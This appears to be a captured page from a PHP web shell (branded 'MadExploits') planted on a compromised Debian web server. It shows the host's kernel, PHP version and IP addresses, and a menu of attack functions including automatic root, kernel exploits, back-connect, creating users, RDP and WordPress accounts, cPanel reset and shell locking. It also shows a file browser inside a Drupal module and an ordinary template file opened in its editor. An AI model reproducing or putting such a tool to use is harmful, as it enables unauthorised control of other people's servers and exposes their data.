Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.170.80
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
field_collection /
[ HOME SHELL ]
Name
Size
Permission
Action
ctools
[ DIR ]
drwxr-xr-x
views
[ DIR ]
drwxr-xr-x
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
1.38
KB
-rw-r--r--
field-collection-item.tpl.php
1.31
KB
-rw-r--r--
field_collection.admin.inc
1.87
KB
-rw-r--r--
field_collection.api.php
5.19
KB
-rw-r--r--
field_collection.info
543
B
-rw-r--r--
field_collection.info.inc
936
B
-rw-r--r--
field_collection.install
10.98
KB
-rw-r--r--
field_collection.migrate.inc
5.33
KB
-rw-r--r--
field_collection.module
70.22
KB
-rw-r--r--
field_collection.pages.inc
5.01
KB
-rw-r--r--
field_collection.test
25.46
KB
-rw-r--r--
field_collection.theme.css
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : field-collection-item.tpl.php
<?php /** * @file * Default theme implementation for field collection items. * * Available variables: * - $content: An array of comment items. Use render($content) to print them all, or * print a subset such as render($content['field_example']). Use * hide($content['field_example']) to temporarily suppress the printing of a * given element. * - $title: The (sanitized) field collection item label. * - $url: Direct url of the current entity if specified. * - $page: Flag for the full page state. * - $classes: String of classes that can be used to style contextually through * CSS. It can be manipulated through the variable $classes_array from * preprocess functions. By default the following classes are available, where * the parts enclosed by {} are replaced by the appropriate values: * - entity-field-collection-item * - field-collection-item-{field_name} * * Other variables: * - $classes_array: Array of html class attribute values. It is flattened * into a string within the variable $classes. * * @see template_preprocess() * @see template_preprocess_entity() * @see template_process() */ ?> <div class="<?php print $classes; ?> clearfix"<?php print $attributes; ?>> <div class="content"<?php print $content_attributes; ?>> <?php print render($content); ?> </div> </div>
Close